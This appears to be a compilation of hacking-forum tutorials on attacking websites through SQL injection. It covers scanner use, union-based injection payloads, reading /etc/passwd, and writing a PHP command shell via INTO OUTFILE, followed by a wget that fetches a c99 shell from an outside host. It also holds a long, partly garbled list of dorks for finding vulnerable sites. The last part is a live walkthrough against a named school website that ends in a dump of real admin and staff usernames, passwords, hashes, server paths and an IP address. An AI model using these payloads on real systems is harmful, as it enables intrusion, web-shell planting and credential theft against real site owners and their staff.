Hack a website using WebCruiser

[*]Introduction

Welcome to my step by step tutorial on how to hack a website using WebCruiser Scanner.

As always I will try to explain it in the easiest way so it will be n00b friendly.

I suggest you to practice "hacking" manually as using tools wont make your skills go higher.

Whatsoever there are lazy-ass guys :P who find it better to perform these attacks by tools.

Ok , first of all we need to download WebCruiser Scanner.

Download me here !

Note: If you need a serial code for the program , leave a comment here and I will generate one for you with your nickname, DO NOT PM ME.

_____________________________
________________________


[*]Let's start:
You will need a target , you can use google dorks to find vuln websites.

I won't bother on that part as there are billions of google dorks out there.

Ok , I found my vulnerable website:

Code:
http://www.target.com/vmarket.php?id=17

Let's open WebCruiser Scanner and check the target for vulnerabilities like on the picture below:




Then click Scan Site.



Now we will wait a minute or two , depends on you internet connection speed for the scan to finish , then we will see the results like the image below.



As we can see the website is vulnerable to Sql injection & XSS.

We will perform a SQL injection this time.

[*]Attack
Right click on the vulnerable url and then SQL INJECTION POC , now you
just need to follow the steps below.

I have explained step by step with pictures so it will be easier for you to understand.




Image has been scaled down 15% (814x505). Click this bar to view original image (954x591). Click image to open in new window.


Image has been scaled down 16% (814x504). Click this bar to view original image (961x594). Click image to open in new window.


Image has been scaled down 17% (814x469). Click this bar to view original image (975x561). Click image to open in new window.




So that's all guys , we got the admin info in just 5 minutes :>

HOW TO UPLOAD SHELL THROUGH SQL INJECTION

First of all find a website which is vulnerable to sql injection you can find websites by dorks or manually XD like i have found this.
You need 2 main things
1) Root Path of the website
2) A Writable Directory
If the vulnerable website does'nt show the root path then don't worry i will tell you how to know the root path. :D
And Also Writeable Directory.

www.site.com/index.php?id=10'


I am not starting with abc of sqli hope u know the basics :D
Now we have to found columns of the website then vulnerable columns like my site have 5 columns And 3 is the vulnerable column

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,4,5--

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,version(),4,5--

Let's Try To Load Files Of The Website

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/passwd'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/my.cnf'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/group'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/services'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/hosts'),4,5--

We Won't Need To Read Any Files Mentioned above just to increase your knowledge :D
Now we have to checked the file privilage for the current user for this first you have to find current username.
Like This

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,current_user,4,5--

Our Current Username is etc mine is Ch3rn0by1
Now Check File Privilages for User Ch3rn0by1

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,file_priv,4,5 FROM mysql.user WHERE user='Ch3rn0by1'--

If it shows Y (yes) on the vulnerable column of the website that means we have the file privilages for the current user Ch3rn0by1
And if it is'nt shows Y than Dont waste your time there :D

Ok Now we have to know the root path :D for this we have to know the software which is used in the server
you can use havij and etc/passwd and many more softwares etc/passwd is'nt a software LOL
To know the server software by file etc/passwd use this query

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,load_file('etc/passwd'),5--

now we have our server software etc (/home/Ch3rn0by1)
now read one more file.

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('etc/Ch3rn0by1.conf')4,5--

Where Ch3rn0by1 is your server software name like server name.conf :D

now we have the root path

/home/site.com/public_html etc.

Now we have to find a writeable directory for this you can use google dorks as well and your knowledge too :D

site www.site.com/dir/*/*/*/*/

so its site.com/ch3rn0by1/writeable

now we will upload our evil code

www.site.com/index.php?id=10 UniOn SeleCt 1,2,"<?system($_REQUEST['cmd']);?>",4,5 into outfile '/home/site/public_html/Ch3rn0by1/writeable directory/Ch3rn0by1.php'--+
ok now we have to execute our commands
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=pwd
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=uname -a

Now we will use wget command to upload our evil script

www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=wget http://www.shellsite.com/c99.txt

Now we will rename our c99.txt to php in order to execute it :D

www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=mv c99.txt c99.php

now open it

www.site.com/Ch3rn0by1/writeable directory/c99.php VOILA OUR SHELL GOT LIVE :D

Sqli Dorking Script In Perl

USE: sqliDorking.pl [-d/-bd ] -p [-l Links.txt]  [-f Logs.txt]

Options:
  -gd : Google Dork
  -bd : Bing Dork
  -l : Archivo con links para analizar
  -p : Numero de paginas para buscar
  -f : Archivo donde se guardaran los logs

Exmple The USE:
sqliDorking.pl -gd inurl:product.php?id= -p 3 -f VulneSQL.txt
sqliDorking.pl -l links.txt -f VulneSQL.txt
sqliDorking.pl -bd inurl:product.php?id= -p 3
sqliDorking.pl -l links.txt

Descargar SQLi Dorking ===> http://sourceforge.net/projects/sqlidorking/

Tutorial SQL Injection Union Based with Screens

SQL Injection Union Based (Tutorial with screens)


0x00FFF#~ Summary
0x1 - Introduction
0x2 - Attack
0x3 - Links
0x4 - Credits & Authors


0x1#~ Introduction

# What is SQL Injection?
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database

[?] Info:
- It's a flaw in the web application,not the database, or the server.
- Can be injected into: Cookies, Forms, and URL parameters.

(What are Cookies ? http://en.wikipedia.org/wiki/HTTP_cookie)

LULZ
# Why UNION?
The UNION operator is used in SQL injections to join a query, purposely forged by the tester, to the original query. The result of the forged query will be joined to the result of the original query, allowing the tester to obtain the values of columns of other tables.

0x2#~ Attack

# Here is a list of d0rks to find SQL vulnerabilities:
A lot of these sites are already being hacked by other hackers but it's useful for training !
Code:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=d=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?av
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inur l: info.php?id=
inurl : pro.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:shop+php?id+site:fr
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
inurl:index.php?id=
inurl:trainers.php?id=
inurl:login.asp
index of:/admin/login.asp
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:produit.php?id=+site:fr
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

#------------------------------------------------------------------------------------+
| I have found a vulnerable website, i am not responsible of your damage.
| I prefer make a tutorial on a real site to be in a real situation
#------------------------------------------------------------------------------------+

#[1] Find the vulnerable parameter
Quote:
hxxp://dbhspgoa.edu.in/Article.php?id=92 (no error)
hxxp://dbhspgoa.edu.in/Article.php?id=92' (error)
"Why error ? i don't see any error message  ???"
It's normal, in this case the error is the blank page:



#[2] Find the number of columns
To get to the point, what we're about to do is find how many columns the website has using No Error/Error statements.

Start by entering order by 100--
Quote:
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 100-- (error)
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 50-- (error)
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 15-- (error)
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 10-- (error)
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 9-- (no error)

The page displays correctly, so there are 9 columns:



#[3] Time to execute the UNION SELECT statement
We have to select the 9 columns:
Quote:
hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 union select 1,2,3,4,5,6,7,8,9--
Wow, the number 4 appears, the 4th column is vulnerable to SQL injection and we'll extract the database from here:



#[4] Informations

Now we know where to inject, you can reap some information about the database using: concat(the query())

Examples:
- version()

Quote:
http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,concat(version()),5,6,7,8,9--

- @@datadir

Quote:
http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,@@datadir,5,6,7,8,9--

- @@hostname
Hmm I don't know why it doesn't work on this site

- database()

Quote:
http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT+1,2,3,concat(database()),5,6,7,8,9--

- user()

Quote:
hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,concat(user()),5,6,7,8,9--

-show all

Quote:
hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(database(),0x3c62723e,version(),0x3c62723e,@@datadir,0x3c62723e,user()),
5,6,7,8,9--
0x3c62723e = 0x<br> converted in Hex = 0x3c62723e


First let's look up some functions we're gonna use to extract table names (Important)
Quote:
group_concat = grouping up data to a specific statement
table_name = tables names to be shown on screen
from = location of a specified statement
information_schema.tables = information in the database with table names in it
table_schema = tables in a database
database() = current database in the website
0x0a = a Hex code that creates a new line for organizing tables in an order

#[5] Show all tables of the database
I apply the functions I mentioned
Quote:
hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(table_name,0x0a),5,6,7,8,9 from information_schema.tables where table_schema=database()--

You should see this:
Code:
allumni ,article ,attendance_setting ,banner ,banner_zone ,content ,course ,csv ,division ,events ,ex_student ,exam_desc ,exam_setting ,exam_subjtotal ,exam_type ,final_grading ,grace ,grade_subject ,grading ,groups ,lecture_attendance ,login ,login_admin ,magazines ,mrksht ,navigation ,news ,notice ,photo_category ,photo_details ,pictures ,school_accnt ,schooldays_total ,semester ,standard ,standard_desc ,stream_desc ,stud_history ,stud_score ,student ,student_admission ,student_attendance ,student_exam ,student_grace ,student_grade ,student_gradesubject ,student_subject ,student_ya ,student_yrassessment ,subject ,tags ,tb_excelupload ,tb_quicklinks ,tb_videos ,teacher ,teacher_classes ,teacher_sub_assign ,teacher_subjects ,template ,thoughtforday ,year_assessment ,year_desc

Wow, there are two interesting columns: login and login_admin ! Humm "admin" I love this kind of column



#[6] Extract data from columns

'login' seems to be having users information stored in it.
'login_admin' seems to be having admins information stored in it.

To do this, we're gonna have to alter some queries a bit. Look closely at this syntax:
Quote:
http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(column_name,0x0a),5,6,7,8,9 from information_schema.columns where table_name=0x6c6f67696e5f61646d696e--

We need to replace:
table_name = replaced by "column_name"
information_schema.tables = replaced by "information_schema.columns"
table_schema = replaced by "table_name"
database() = replaced by "0x6c6f67696e5f61646d696e--" (login_admin)

To make a Hex readable, we put "0x" at the beginning. To enter that table using the syntax above, we have to convert that table name to Hex. If you are using the Firefox HackBar like me, you can do that:



And the result will be: 0x44616973756b65a



Or: http://www.string-functions.com/hex-string.aspx

So! After have launched the injection in the column login_admin, we have 4 columns: admin_id, usernme, passwrd, logtime



Let's look up some functions we replaced and know their uses.
Quote:
group_concat(column_name,0x0a) = grouping the column names we're going to extract
information_schema.columns = column names stored in database
table_name = extracting column from a specific table
0xHEX_Code_Table = Specific table name converted to hex

Results:
Quote:
hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(admin_id,0x0a,passwrd,0x0a,logtime,0x0a,usernme,0x0a),5,6,7,8,9 from login_admin--

It show admin credentials:
admin_id    passwrd    logtime    usernme
1    3¢PÉÜœz;þß„mJ…    2014-02-11 01:25:09    admin




You can try with the column that you want. I use the same injection for the column login

Quote:
http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(column_name,0x0a),5,6,7,8,9 from information_schema.columns where table_name=0x6c6f67696e--



Then

Quote:
http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(a_id,0x0a,aname,0x0a,apass,0x3c62723e),5,6,7,8,9 from login--



The final dump
Code:
____        _           _      
|  _ \  __ _(_)___ _   _| | _____
| | | |/ _` | / __| | | | |/ / _ \
| |_| | (_| | \__ \ |_| |   <  __/
|____/ \__,_|_|___/\__,_|_|\_\___|
            /\  The Hackers Bay | The Hackers Boat
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /====================================="
            \/
          
          
http://dbhspgoa.edu.in
goaed_ucation
5.0.37-standard
/var/lib/mysql/
goaed_ucationu@72.35.83.36

===============table admin================
admin_id, usernme, passwrd, logtime
1 3¢PÉÜœz;þß„mJ… 2014-02-11 01:25:09 admin

===============table login================
a_id ,aname ,apass ,logtime ,fullname ,atype ,t_status ,a_schid ,school_news ,school_attendance ,school_magazine ,school_marksht ,school_stud ,school_allum ,school_content ,school_daythought ,school_event ,school_nav ,school_ban ,school_photo ,school_art ,school_courses ,school_teacher ,school_grace ,school_report ,school_admission ,school_testimonial ,school_excelsheet

1 admin admin
,2 sanjeevh sanjeev
,3 teacher1cc teacher1cc
,4 teacher12gg teacher12gg
,5 teacher122 teacher122
,6 teacher100 teacher100
,7 teacher155 teacher155
,8 teacher177 teacher177
,9 teacher277 teacher277
,11 fragnel f2009
,12 test M»`¹¾l‚L:d)µ¦Á
,13 donbosco D�e©«vý¹`MáúK
,14 pccc2010 †ÉZ¶ºšb˜C$‹4-|
,15 Roy W$÷
_5�g:¹ò@ÝÞ
,16 Principal ¿¦o¹ƒ4º~ÂëÞʲP
,17 francis ›Ùó ¹ÈìÕ'ꊡ¸†#
,18 xavmartin ›Ùó ¹ÈìÕ'ꊡ¸†#
,20 ishaniroy •¹òÄ xR¾–îƒSû³X
,22 namdevg >y Œö÷Úèá’#qž
,23 oscarn Ò² «5ÅÆl5B«ƒ3õc
,24 soniyas ´oÀ�7#ÆWâ²Ë“ðû
,25 hclerk t/#`eó
´©ýŠ†ê
,29 satishsanvol .ó�Ü:¿#ÿ²£Á3cw
,30 stmichael_e4r Ün‘šÆ‡H3«CÙS„-
,31 test ص¦†õ%„p8B×€bYàÛ
,32 test1 Ïf¥ÓeÜ9ê„š¨¬ó
,33 zantye ¢ ååçêaGÿF0c]Ì

================Misc================
Apache 1.3.41
FrontPage/5.0.2.2510
Apache module mod_perl/1.29 FrontPage/5.0.2.2510
Mod SSL 2.8.31
Open SSL 0.9.8b
